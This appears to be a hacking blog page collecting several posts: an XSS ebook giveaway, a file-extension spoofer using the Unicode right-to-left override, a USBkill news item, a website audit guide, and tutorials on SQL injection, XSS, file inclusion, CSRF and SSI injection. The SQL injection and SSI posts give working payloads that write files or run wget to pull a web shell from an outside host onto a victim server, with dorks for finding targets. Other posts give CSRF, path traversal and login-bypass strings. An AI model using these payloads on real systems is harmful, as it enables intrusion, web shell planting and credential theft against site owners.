Copyright By Edward Maya. Powered by Blogger.
.

COLLECTION OF ADVANCE XSS EBOOKS

  • by
  • Maya Badmash
  • Hello everyone,

    It's been a long time I haven't posted anything on my blog. So just giving away my premium collection of XSS Eboks Every thing about XSS

    I have this collection in my pc and what to share here

    This collection
    • Advanced XSS
    • Alexander Sotirov Blackbox Reversing of XSS filters
    • Cross Site Scripting Attacks XSS, Exploits and Defense
    • DOM Based Cross Site Scripting or XSS of the Third Kind
    • XSS Cross Site Scripting
    • XSS Evolution
    Click on download link below to download the awesome collection of advance xss attacks.

    Click Here to Download :- Click Me
    Sorry for the ads 5-10 sec ads
    Read More...

    IT Security Beginner: Certified Hacking Training

  • by
  • Maya Badmash
  • This course is ideal for everyone, regardless of their skills and expertise. The arrangement and presentation of learning resources will let both novices and more advanced students broaden their knowledge of IT security. 

    Training is starting with IT Security current threat and trends. Afterwards we are disscussing popular security myths. Great part of the training relates to Network security. 

    We will start with local networks, talk about protocols and theirs vulnerabilities. You will learn how to design secure computer networks and subnets. You will become real network administrator. 

    Next you will discover why wireless networks could be so dangerous. You will learn standards, protocols and security solutions. Wi-Fi networks are an integral part of our lives, but not everyone realises that if it is inadequately protected, your enterprise or home network can disclose your confidential passwords and give attackers easy access to the machines you’re administrating. 

    Topics covered include core issues related to effectively securing the most popular Microsoft OS: identity theft, athentication, authorisation, encryption. We identify typical mistakes and guide you towards achieving good OS protection.

    What are the requirements?
    •General IT knowledge
    •No programming skills needed on IT Sec Beginner course

    What am I going to get from this course?
    •Over 25 lectures and 7 hours of content!
    •IT security trends.
    •Security myths.
    •Learn about Wi-Fi network standards and protection.
    •Get to know about Wi-Fi threats.
    •Improve your grasp on Windows security.
    •Understand what security boundaries are.
    •Find out how to fight malware.
    •Discover secret tips on access control in Windows.
    •Learn how Windows authentication works.
    •Prevent identity spoofing.
    •Find out the mechanisms of Windows authorisation.
    •Learn about Windows 7 security mechanisms.
    •Get to know how to encrypt data in Windows.
    •Wi-Fi network standards and protection.
    •Wi-Fi network threats.
    •How to prevent identity spoofing.

    Download


    Direct Link: 

    Read More...

    EXTENSION SPOOFER

  • by
  • Maya Badmash
  • Heyo! 
    I've developed a simple extension spoofer. It pastes a Unicode character (202E) at the beginning of the file name which inverts the character alignment and allows you to write at the end of the extension.
    It's a command line tool so there is no GUI.


    It requires Java 8 to run.
    It'll look weird if the file is put inside an archive so I recommend to do this archive spoof. Just search for it.

    Run the program as:

    Code:
    java -jar extension_spoofer.jar [FILE_PATH]

    If you're on Windows you can also execute the batch file.

    Download HERE.

    Please leave some feedback!
    Read More...

    USBkill - Turns USB Drives Into PC Killing Weapon

  • by
  • Maya Badmash
  • usbkill-kills-computer-usb
    Here’s a news that will cheer up all the activists, criminals, activists and whistle blower. Now they have got a new tool called USBkill to save themselves by shutting down the computer before the sensitive information will be examined.
    USBkill turns your USB into a kill switch once activated. It’s a program – a computer code that will disable the computer if there’s any activity at the USB port. This weapon could be kept in the USB drives and attached to the computers with sensitive information.
    Hephaestos, the programmer who wrote the USBkill script, says that USBkill is an anti-forensic USB. He says that it will be of utmost important in case the police busts your bunker, or steals your laptop. USB waits for some change at USB ports and then suddenly kills your computer. He writes:
    The police will use a mouse jiggler to keep the screensaver and sleep mode from activating. If this happens you would like your computer to shut down immediately. Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start USBkill. If they then steal your computer, the USB will be removed and the computer shuts down immediately.
    If the police catches you, you would want your PC to shut down immediately. He advises the users to tie the USB drive to your wrist and instantly start the USBkill by removing the USB when cops knock down your door.
    He adds that users must use full disk encryption, otherwise law enforcement agencies will have their party anyway.
    It’s an unfinished work and will be improved by Hephaestos. But, it does work effectively.
    See the USBkill code here on GitHub: USBkill on GitHub
    Read More...

    A Complete Guide To Securing A Website

  • by
  • Maya Badmash
  • To secure a website or a web application, one has to first understand the target application, how it works and the scope behind it.  Ideally, the penetration tester should have some basic knowledge of programming and scripting languages, and also web security.
    A website security audit usually consists of two steps.  Most of the time, the first step usually is to launch an automated scan.  Afterwards, depending on the results and the website’s complexity, a manual penetration test follows.  To properly complete both the automated and manual audits, a number of tools are available, to simplify the process and make it efficient from the business point of view.  Automated tools help the user making sure the whole website is properly crawled, and that no input or parameter is left unchecked.  Automated web vulnerability scanners also help in finding a high percentage of the technical vulnerabilities, and give you a very good overview of the website’s structure, and security status.  Thanks to automated scanners, you can have a better overview and understanding of the target website, which eases the manual penetration process.
    For the manual security audit, one should also have a number of tools to ease the process, such as tools to launch fuzzing tests, tools to edit HTTP requests and review HTTP responses, proxy to analyse the traffic and so on.
    In this white paper we explain in detail how to do a complete website security audit and focus on using the right approach and tools.  We describe the whole process of securing a website in an easy to read step by step format; what needs to be done prior to launching an automated website vulnerability scan up till the manual penetration testing phase.
    1.Manual Assessment of target website or web applicationSecuring a website or a web application with an automated web vulnerability scanner can be a straight forward and productive process, if all the necessary pre-scan tasks and procedures are taken care of.  Depending on the size and complexity of the web application structure, launching an automated web security scan with typical ‘out of the box’ settings, may lead to a number of false positives, waste of time and frustration.
    Even though in recent year’s web vulnerability scanning technology has improved, a good web vulnerability scanner sometimes needs to be pre-configured.  Web vulnerability scanners are designed to scan a wide variety of complex custom made web applications.  Therefore most of the times, one would need to fine tune the scanner to his or her needs to achieve the desired correct scan results.
    Before launching any kind of automated security scanning process, a manual assessment of the target website needs to be performed.  It is a well known fact that an automated scanner will scan every entry point in your website which most likely you tend to forget, and test it for a wide variety of vulnerabilities.
    During the manual assessment, familiarize yourself with the website topology and architecture.  Keep record of the number of pages and files present in the website, and take record of the directory and file structure.  If you have access to the website’s root directory and source code, take your time to get to know it.  If not, you can manually hover the links throughout the website.  This process will help you understand the structure of the URL’s.  Also, take a note of all the submission and other type of online forms available on the website.
    During the pre-automated scan manual assessment, apart from getting used to directory structures and number of files, get to know what web technology is used to develop the target website, e.g.  .NET or PHP.  There are a number of vulnerabilities which are specific for different types of technologies.  Other details you should lookout for when manually assessing a website are;
    • Does the website require client certificates to be accessed?
    • Is the target website using a backend database?  If yes, what type of database is it?
    • Is the database server running on the same server as the website?
    • Are all the sensitive records being encrypted?
    • Are there any URL parameters or URL rewrite rules being used for site navigation?
    • When a non existing URL is requested, does the web server return a HTTP Status Code 404, or does it return a custom error page and responds with a HTTP Status Code 200?
    • Are there any particular input forms or one time entry forms (such as CAPTCHA and Single Sign on forms) that need user input during an automated scan?
    • Are there any password protected sections in the website?
    Once the manual assessment process is ready, you should know enough about the target website to help you determine if the website was properly crawled from the automated black box scanner before a scan is launched.  If the website is not crawled properly, i.e. the scanner is unable to crawl some parts or parameters from the website; the whole “securing the website” point is invalidated.  The manual assessment will help you go a long way towards heading off invalid scans and false positives.  It will also help you get more familiar with the website itself, and that’s the best way to help you configure the automated scanner to cover and check the entire website.
    2. Get familiar with the software
    Although many automated web vulnerability scanners have a comfortable GUI, if you are new to web security, you might get confused with the number of options and technical terms you’ll encounter when trying to use a black box scanner.  Though do not give up, it is not rocket science.  Commercial black box scanners are backed up by professional support departments, so make sure you use them.  You could also find a good amount of information and ‘how to’s’ about the product you are using online.  There are also a good number of open source solutions as well, but most of the time you have to dig deep and paddle on your own in rough waters to find support for such solutions.  Many commercial software companies are also using social networks to make it easier for you to get to know more about their product, how it works and best practices on how you should use it.
    3. Configuring the automated black box scanner

    Once you’re familiar with the automated black box scanner you will be using, and the target website or web application you will be scanning, it is time to get down to business and get your hands dirty.  To start off with, one must first configure the scanner.  The most crucial things you should configure in the scanner before launching any automated process are;
    • Custom 404 Pages – If the server returns HTTP status code 200 when a non existing URL is requested.
    • URL Rewrite rules – If the website is using search engine friendly URL’s, configure these rules to help the scanner understand the website structure so it can crawl it properly.
    • Login Sequences – If parts of the website are password protected and you would like the scanner to scan them, record a login sequence to train the scanner to automatically login to the password protected section, crawl it and scan it.
    • Mark page which need manual intervention – If the website contains pages which require the user to enter a one time value when accessed, such as CAPTCHA, mark these pages as pages which need manual intervention, so during the crawling process the scanner will automatically prompt you to enter such values.
    • Submission Forms – If you would like to use specific details each time a particular form is crawled from the scanner, configure the scanner with such details.  Nowadays scanners make it easy for you by populating the fields automatically (such as in Acunetix WVS).
    • Scanner Filters – Use the scanner filters to specify a file, or a file type, or directory which you would like to be excluded from the scan.  You can also exclude specific parameters.

    4. Protect your dataFrom time to time I noticed people complaining that web vulnerability scanners are too invasive, therefore they opt not to run them against their website.  This is definitely a bad presumption and wrong solution, because if an automated web vulnerability scanner can break down your website, imagine what a malicious user can do.  The solution is to start securing your website and make sure it can handle properly an automated scan.
    To start off with, automated web vulnerability scanners tend to perform invasive scans against the target website, since they try to input data which a website has not been designed to handle.  If the automated vulnerability scanner is not that invasive against a target website, then it is not really checking for all vulnerabilities and is not doing an in-depth security check.  Such security checks could and will lead to a number of unwanted results; such as deletion of database records, change a blog’s theme, a number of garbage posts placed on your forum, a huge number of emails in your mailbox, and even worse, a non functional website.  This is expected, because like a malicious user would do, the automated black box scanner will try its best to find security holes in your website, and tries to find ways and means how to get unauthorized access.

    Therefore it is imperative that such scans are not launched against live servers.  Ideally a replica of the live environment should be created in a test lab, so if something goes wrong, only the replica is affected.  Though, if a test lab is not available, make sure you have latest backups.  If something goes wrong, the live website can be restored and be functional again in the shortest time possible.
    5. Launching the scan

    Once the manual website analysis is ready, and the black box scanner is configured, we are ready to launch the automated scan.  If time permits, you should first run a crawl of the website, so once the crawl is ready, you can confirm that all the files in the website and input parameters are crawled from the scanner.  Once you confirm that all the files are crawled, you can safely proceed with the automated scan.
    6. After the scan – Analysing the results

    Once the automated security scan is ready, you already have a good overview of your website’s security level.  Look into the details of every reported vulnerability and make sure you have all the required information to fix the vulnerability.  A typical black box scanner such as Acunetix Web Vulnerability Scanner will report a good amount of detail about the discovered vulnerability, such as the HTTP request and response headers, HTML response, a description of the vulnerability and a number of web links from where you can learn more about the vulnerability reported, and how to fix it.

    If AcuSensor Technology (Acunetix WVS) is enabled, much more debug information is reported; the line of code which leads to the reported vulnerability, SQL stack trace in case of SQL injection etc.
    Analysing the automated scan results in detail will also help you understand more the way the web application works and how the input parameters are used, thus giving you an idea of what type of tests to launch in the manual penetration test and which parameters to target.
    7. Manual penetration test

    There are a number of advantages in using a commercial black box security scanner such as Acunetix Web Vulnerability Scanner.  Apart from benefitting from professional support and official documentation, it also includes a number of manual advanced penetration testing tools.  Having all the web penetration testing tools available in a centralized web security solution has the advantage that all the tools support importing and exporting of data from one to the other, which you will definitely need.  It also helps manually analyzing the scan results by exporting the automated scan results to the manual tools and further look into the issues.

    As much as the automated scan, the manual penetration test is also a very important step in securing a website.  If the advanced manual penetration testing tools are used properly, they can ease the manual penetration test process and help you be more efficient.  The manual penetration testing helps you audit your website and check for logical vulnerabilities.  Even though automated scans can hint you of such vulnerabilities, and help you in pin pointing them out, most of them can only be discovered and verified manually.
    7.b. Below are two examples of logical vulnerabilities

    While auditing a shopping cart, you notice that if you manually set the price parameter to 0, in the checkout request, the customer can get the product for free without being asked for the payment details.
    Or else imagine an online ads company promotes a new campaign;  create an online account, buy $100 worth of ads and they will give you an extra $100 worth of ads for free. During development stage, the developers should make some kind of check statement like the following;
    IF new account AND deposits $100 THEN give $100
    If the developers forgot the AND statement, then upon opening an account and without the need to purchase $50 worth of adverts, you will still get your $100 worth of free ads.
    One might think that such logical vulnerabilities are very remote, or that they are a joke, but we do encounter them when analysing production web applications.  Such vulnerabilities are typically discovered by using several manual penetration testing tools together, like the HTTP Sniffer to analyze the application logic, and then the HTTP Editor to build HTTP requests, send them and analyze the server response.

    Conclusion
    As we can see from the above, web security is very different from network security.  As a concept, network security can be simplified to “allow good guys in and block the bad guys.”  Web security is different; it is much more than that.  Though never give up.   There are tools available out there which will automate most of the job for you, assist you and make the whole process easier and faster.

    Download this white paper as PDF.
    Read More...

    SQL Injection To Shell

  • by
  • Maya Badmash
  • Hello Everyone, 

    Today, I'm going to teach you how to upload a shell through SQL injection (+No needed an Admin Panell),

    I usually use this method to upload shell, but it's not easy to find a good website to make this method on.

    Requirements:

    • Vulnerable site.
    • Shell in txt format [Example: http://[site].com/shell.txt].
    • Your Brain (;
    ~~~
    Firstly, we need to use order by statement to count the number of columns.

    Quote:http://[site].com/index.php?id=1+order+by+1-- [TRUE]
    http://[site].com/index.php?id=1+order+by+2-- [TRUE]
    http://[site].com/index.php?id=1+order+by+3-- [TRUE]
    http://[site].com/index.php?id=1+order+by+4-- [*FALSE*]

    We made a nice work meanwhile. Now we're using by UNION SELECT statement:

    Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3--

    Let's say that our vulnerable column is: 2, so:

    Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,user,3+FROM+mysql.user--

    And --> viola! the MySQL user is: Josh(For example).
    but, now we need the full site path

    Let's continue

    Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,load_file('/etc/passwd'),3--

    You can see the full path in the passwd file.
    As you can see, I got the full path! There are many methods in order
    to find the full path.

    [Example for full path: /home/domain/public_html/] .

    What you should now is only to use INTO OUTFILE statement.
    Example:

    Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3+INTO+OUTFILE+"/home/domain/public_html/test_permission.txt"--

    Now, If the page loaded normally(I mean...returned value is TRUE) so we have write access...If not, just look for other directory to write them until you will get TRUE value and the page will load normally.

    Ok, now I will try to upload the shell ! :).
    Watch and learn :

    Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,"<?php system('wget http://othersite.com/shell.txt -O shell.php'); ?>",3+INTO+OUTFILE+"/home/domain/public_html/login_here_to_upload_shell.php"--

    Then, just go to 
    login_here_to_upload_shell.php file and when it finishes to load, go to shell.php and....tada
    You shelled the website :)

    If system() function is disabled, you can try:

    • ~ exec();
    • ~ shell_exec();
    • ~ file_put_contents();
    • ~ fopen(); \ fwrite();
    There are more tricks, Enjoy !
    Read More...

    Web Application Hacking - Behind The Scenes

  • by
  • Maya Badmash
  • [Image: SzJYH.png]

    Table of Contents

    • Introduction
       
    • MySQL injection

      ▸ How does MySQL injection work?
      ▸ How do our malicious queries get executed?
    • Cross Site Scripting

      ▸ How does Cross Site Scripting work?
      ▸ How do our malicious vectors get executed?
    • File inclusion

      ▸ How does Local & Remote File Inclusion work?
      ▸ How do we exploit file inclusion vulnerabilities?
       
    • Epilogue
    Introduction

    Ever wanted to understand how your attacks worked rather than using your attacks without understanding? Then this tutorial is just for you.
    This tutorial was created for the sole purpose to help educate the users of this community as I don't think all of you truly understand what is actually going on behind the scene.
    For those who wish to know how and why these common attacks work instead of using third party programs to do the work for you, or blatantly use attacks with no knowledge of how they work, then continue to read this thread.
    I am not responsible for what you use this for, this is for educational purposes only.

    MySQL injection

    How does MySQL injection work?

    MySQL injection works because programmers do not properly sanitize their input by not escaping their MySQL queries that are being submitted by unauthorized users.
    MySQL injection vulnerabilities are usually exploited by inputting MySQL queries into a page's GET parameter. If you do not know what a GET parameter is, then this is an example:

    Code snippet:
    PHP Code:
    <?php

    $page_id = $_GET['id'];

    ?>

    http://site.com/article.php?id=12

    Take notice of the red text, it contains the value of our GET parameter "id".
    Even though it is commonly exploited via GET parameters, it is not limited to them.

    How do our malicious queries get executed?

    MySQL queries are usually exploited by modifying the current query, usually blocking off the currently functioning query and adding your own to spit out information or to get around insecure login scripts.
    For example this is a snippet of a PHP script that is vulnerable to MySQL injection:

    PHP Code:
    <?php

    $user = $_POST['username'];
    $password = $_POST['password'];

    $query = mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");

    ?>

    To get a better understanding of how it works, I will dissect the code for you as best as I can.

    $user, $password
    These are variables that store a value to make it easier to bring up the contents of that value in the future, whether it be a number, a string etc.

    $_POST['username'], $_POST['password']
    These are the values that were stored within our $user and $password variables.
    Do you remember I was talking about GET? There are two different types of parameters that can be used to send the data. You can either use GET or POST.
    The difference between them is GET's value can be viewed through the URL whereas POST's value cannot be viewed.

    mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");
    mysql_query(); is a preset function that allows you to execute MySQL queries. The text inside our mysql_query(); function (inside the parentheses) is the query that will be executed.

    So we know our query is SELECT * FROM users WHERE username = '$user' AND password = '$password', so how do we exploit it?

    A lot of you may know of the good ol' ' or '1'='1, correct?
    I will be using that to demonstrate how to bypass insecure login scripts.

    PHP Code:
    <?php

    $user = $_POST['username'];   // We submitted ' or '1'='1 as our username.
    $password = $_POST['password'];   // We submitted ' or '1'='1 as our password also.

    mysql_query("SELECT * FROM users WHERE username = '$user' AND password = '$password'");

    ?>

    We have just successfully exploited an insecure login script, but how did it work? What was the output?

    PHP Code:
    SELECT * FROM users WHERE username = '' or '1'='1' AND password = '' or '1'='1'-- 

    Still don't understand? We closed off the current table value when it was asking for the username and password username = ' ' or '1'='1' (it's the same for the password).
    We are basically saying if the username equals nothing or 1 is equal to 1 then proceed. The value of username is true so it proceeds.

    Cross Site Scripting

    How does Cross Site Scripting work?

    Cross Site Scripting works because programmers fail to sanitize user input, just as I explained in the MySQL injection section of this tutorial.
    Cross Site Scripting enables a remote user to inject client-sided script into a webpage, generally for the best effect; into a GET parameter as stated before.
    I will not go through what a GET parameter is again, if you forget then scroll back up to the MySQL injection section of this tutorial.


    How do our malicious vectors get executed?

    Cross Site Scripting vectors usually get executed by adding on to the already functioning vector. Cross Site Scripting can lead up to a full OS compromise if you know how to utilize your knowledge of programming.
    For example this is a snippet of a PHP script that is vulnerable to Cross Site Scripting:

    PHP Code:
    <html>

    <form method="GET">
    <input type="text" name="keywords" /> <input type="submit" name="search" />
    </form>

    </html>

    <!-- End of HTML -->

    <?php

    $input = $_GET['keywords'];

    if($input)
      echo $input;

    ?>

    I'll assume you do not understand what this means, once again I shall dissect the code so you can understand. However, I will leave out what I have already covered.

    <form method="GET"></form>
    A form created to contain the input fields, using the method GET which is our parameter.

    <input type="text" name="keywords" /> <input type="submit" name="search" />
    We have two types of input fields, type "text" and type "submit". Type "text" is pretty self-explanatory, it allows you to input text into a text box and type "submit" allows you to submit that text.
    We have named the input box (type text) "keywords" which is how we define the name of the GET parameter containing the value of our input.

    if($input)
    echo $input;
    This checks whether or not our GET parameter (keywords) value has been set. If it has then it will print out the user input. It does not sanitize user input, so the text we input will be formatted into code if we wish.

    [Image: 07oTn.png]


    File inclusion

    How does Local & Remote File Inclusion work?

    File inclusion is possible because, once again, programmers do not sanitize user input.
    Once again, generally exploited through GET parameters but not limited to them. A lot of them are usually done by POST parameters as well.
    File inclusion works by including a file to a webpage, whether it be an internal or an external source. We generally include files such as /etc/passwd or /etc/shadow from within the users files to output user credentials, you can also include /proc/self/environto include your own scripts, isn't that cool? That is Local File Inclusion. As for Remote File Inclusion, generally you include a PHP shell so you can then upload your shell from within the shell included on the page so it is actually on the server.

    How do we exploit file inclusion vulnerabilities?

    Let's start off with a PHP snippet so we can grasp what we are dealing with and how our files get included onto the webpage in the first place.

    PHP Code:
    <?php

    $page_id = $_GET['page'];
    $extension = ".php";
    $file = $page_id . $extension;

    include($file);

    ?>

    I believe that's pretty self-explanatory. I explained everything in that snippet already, excluding the include(); function.
    If you do not understand I will just explain it to save you the hassle of searching it up.

    include($file);
    We already know what the value of the variable $file contains, so all the include(); function does is attempt to include the file within the parentheses.

    So we know how files are included, so how are we going to exploit the vulnerable file?
    I'll be using /etc/passwd for this Local File Inclusion example.
    For example, this is the site we wish to include a local file and output it onto the webpage:

    http://site.com/index.php?page=articles.php

    To exploit this we will include /etc/passwd instead of articles.php.

    http://site.com/index.php?page=../../../etc/passwd%00

    Don't understand? Here is an explanation.

    ../../../
    For each ../ you are moving down one directory, so we are moving down three since we have used three.
    Let's say for example that the file path was the following.
    /var/www/billy
    We have moved to the directory just before current root directory (one directory before /var/)
    So we are accessing a directory that not even the web administrator should be able to access, unless he was using his own web hosting.

    /etc/passwd
    The /etc/passwd file contains the login credentials of all the users who are able to access Billy's directory.

    %00
    This is called a "null byte" and we are using this because the file extension .php is in the way of our inclusion.
    Without the null byte our inclusion would look like the following:

    http://site.com/index.php?page=../../../etc/passwd.php

    The file extension (.php) will not show up in the URL, however it would include it like the following and you will get an inclusion error similar to this:

    PHP Code:
    Warning: include() [function.include]: Failed opening '../../../etc/passwd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/public_html/test.php on line 7 

    We don't want to include a PHP file, so we need to work around that by using our null byte.

    As for Remote File Inclusion, it is pretty much the same, however you're getting it from an external source. An example would be akin to the following:

    http://site.com/index.php?page=http://mysite.com/shell.php

    However, you will not need to include the file extension if the file extension has already been set to .php, which in this case, it is.

    Epilogue

    You have now finished reading my tutorial, hopefully it somewhat helps you in the future and allows you to get a better grasp about what is going on in the background. Knowing how things work can make a big difference when trying to attack a website.
    In my text tutorial, it will be how to prevent and secure your site from these attacks.
    I hope you enjoyed my tutorial, thank you for reading.
    Read More...

    CSRF - An Enemy You Must Know

  • by
  • Maya Badmash
  • Today, I'm going to explain you about WEB vulnerability that not everyone knows...but it very popular.
    This vulnerability is very dangerous and effective.
    Usually, the vulnerability exploiting never leave evidences.
    This vulnerability called: Cross Site Request Forgery(CSRF)
    CSRF and the way to exploit it is extremely easy; Much easier then all the complicated injections.

    How does it works?

    It works by forcing the victim's browser to run HTTP requests in order to implement a range of actions, for example :

    • Permission faking\stealing.
    • Transfer of funds from the Bank
    • Disruption of the normal sequence of the site
    And much more.

    Requirements to exploiting CSRF.

    • Make sure that the victim have SESSION \ COOKIE on the target site.
    • Victim must be identified by the network protocol verification (HTTP Authentication)
    Actually, In order to cause the victim to perform unwanted actions he is not aware of, the victim must be logged to the target site with cookies and verified by the browser \ server.

    Common uses CSRF attacks.

    Common attack is using the image tag (img src) in the HTML document. I mean, in the SRC of the image tag must be inserted malicious link should send HTTP requests to the target, such as a GET request can be excellent. The benefits of using an image tag on the normal link tag (a href) are :

    1. Image tag does not require clicking the link compared Tag-A requires clicking on the link to activate the HTTP request.
    2. Nature of browsers is to send HTTP requests to visual objects such as picture or remote files (CSS, JS, etc.) even while loading the page without the user's permissions. This means the user does not need to perform any action in order to see the image on the page, all he has to do is go to a certain site specific browser sends HTTP requests have to load the image. In this case, since the browser recognizes the HTML code of the image tag, it sends HTTP requests to load the image even if the SRC of the image is not really a picture, but a malicious link ...

    For those of you that uses Fire-Bug(Firefox add-on) can see in the next snapshot example of sending an HTTP request from the browser to the server to load an image during the login of the user:
    [Image: InUNu.png]

    Also, CSRF attacks can be implemented not only through websites but through email messages. Since the mail boxes allow sending data to HTML format, the attached image perfectly legal. In this case I can send a malicious email message to huge amount of recipients, put a photo tag email body when the SRC contain a malicious link, when the victim opens the email, the desired action done.

    Exploiting code examples: 

    HTML
    Using img tag: 

    PHP Code:
    <img style="display:none;" src="http://targetsite.com/change_password.php?new_password=123456"> 

    Using iframe tag:

    PHP Code:
    <iframe src="http://targetsite.com/change_password.php?new_password=123456"></iframe> 

    Java Script
    using image object.

    PHP Code:
    <script>
      var poniz = new Image();
      test.poniz = "http://targetsite.com/change_password.php?new_password=123456";
    </script> 

    Exploiting sequence

    Here a cool example that actually belong to Black-SEO.
    Since almost all peoples define home page\favourite web address in their profile. What I want to check in my user control panel is the parameters are sent as a request to HTTP server when I'm updating my home page via the user control panel.
    There are a variety of fields that can be updated, such as address, phone, email, name, content, and most importantly for this example: The favorite website\home page address.

    These parameters are sent to the server when updating my website address. So it seems to Firebug: 
    [Image: UYIgx.png]

    These parameters are sent to the server using POST method. So we do not see the parameters in the URL address. But, if the parameters will be written via GET method, the data will sent? Let's see.

    Code:
    http://targetsite.com?users.php?db[webaddress]=http://www.PonizSite.com&action=save

    It works! (Actually...in the server-side code(php), the variable was in REQUEST method...but it's not matter)


    Now ... Imagine that I create Dork like this one:

    Quote:site:targetsite.com & intext:"Homepage" & intext:"email: "

    Now, I've got all the emails of users and I can send them an emails with img tag, and when they will open it, their home page\website address field in their profile will change(To http://www.ponizSite.comOui

    How to prevent?

    There are not many hermetical familiar solutions to prevent CSRF attacks. 
    Except from one: Tokens.
    What are actually tokens? This is a hidden random ID responsible for sending structured data, such as logging into forms, forms that allow registered users to update data or home page(in our case Evilgrin)

    PHP Code:
    <input type="hidden" name="8pssf18ssdmf8s7p80fodi" value='1' id="token" /> 

    Since the tokens are defined, the attacker can not know what is the token of the victim, because every loading of the page the token will change to other random number\string.

    Tips :

    • Don't forget to delete your cookies.
    • Use tokens(Captcha is safer).
    • When you built your php site, don't use GET \ REQUEST super-global variables.
    Bypassing the tokens is easy(At least for me)... but I just gave you the most used solution.
    My solution is to build a captcha system that based on sessions... :3

    Well...I'm done (:

    Thanks viewing my thread and I hope you learned something ! 

    Note: When some site is XSSable, it's pretty good injection point to do there CSRF...buy that's not matter because you can create CSRF attack on target site even from your own localhost...it's all about the HTTP requets.
    Read More...

    Server Side Include Injection(SSI Injection)

  • by
  • Maya Badmash

  • Part 1 - Server Side Includes && General background.

    Server Side Includes
    (SSI) is server language for web pages, designed to make static HTML pages a little more dynamic. SSI meant to make HTML pages similar to dynamic applications, such as those written in ASP, PHP and similar languages​​ and allow the inclusion of dynamic information server in HTML pages.

    HTML pages with SSI tags usually have shtml extension or shtm. On IIS server the extension stm also possible.

    The most common use of SSI is including contents of files into a web page from the web server.
    The SSI code must be with rounded with <!--# and --> tags.
    SSI functions\commands syntax are usually like this :
    <!--#function_name parameter="value" -->

    Live example: 
    All who knows PHP can understand that the following codes are doing the same thing\action:
    With PHP :

    PHP Code:
    <?
    include('head.txt');
    ?>

    With SSI :

    PHP Code:
    <!--#include virtual="head.txt" --> 

    So...I'm giving you now the most common functions\commands in SSI :

    • echo 
      Parameters: var.
      Uses: To print contents of HTTP environment variables, like HTTP_ACCEPT, LAST_MODIFIED, and HTTP_USER_AGENT.
      Example :
      PHP Code:
      <!--#echo var="REMOTE_ADDR" --> 
      ~
    • include
      Parameters: virtual\file
      Uses: To includes files.
      Example:
      PHP Code:
      <!--#include virtual="file.html" --> 
      Another option with file parameter:
      PHP Code:
      <!--#include file="file.html" --> 
      ~
    • exec
      Parameters: cmd\cgi
      Uses: Executes script, shell command and program on the server. cmd parameter contain a server-side command and the cgi parameter contain the path to a CGI script.
      Example:
      To run cgi script:
      PHP Code:
      <!--#exec cgi="/cgi-bin/any_script.cgi" --> 
      To execute shell command:
      PHP Code:
      <!--#exec cmd="ls -A" --> 

    Part 2 - Exploiting.

    So...here the fun part begin :3
    As I said in the 1st part, the most common extension to HTML pages that uses Server Side Includes is shtml.
    So...we'll use that dork :

    Code:
    inurl:login.shtml

    I found this page and entered my username as Sylar:
    [Image: Fw7qE.png]

    We can see in the image above that the username we entered has displayed on the screen after we send the data and the page with shtml extension, so what do you think that will happen if we enter our username as :

    PHP Code:
    <!--#echo var="HTTP_USER_AGENT" --> 

    And guess what our output?
    [Image: 8oms4.png]
    Viola :>

    Now we'll try to enter the following code as username:

    PHP Code:
    <!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" --> 

    Our output:

    [Image: VDc9n.png]

    The command executed successfully 

    Now let's check if our shell uploaded :


    [Image: 4a7bR.png]
    Yes, it is :3

    Dorks

    inurl:bin/Cklb/ - Best Dork
    inurl:login.shtml
    inurl:login.shtm
    inurl:login.stm
    inurl:search.shtml
    inurl:search.shtm
    inurl:search.stm
    inurl:forgot.shtml
    inurl:forgot.shtm
    inurl:forgot.stm
    inurl:register.shtml
    inurl:register.shtm
    inurl:register.stm
    inurl:login.shtml?page=

    Uhm...that's all(I think)
    Hope you guys learned something.
    Read More...
     
    Copyright (c) 2013 Edward Maya
    Sponsored By : Chris Defaulter Valentine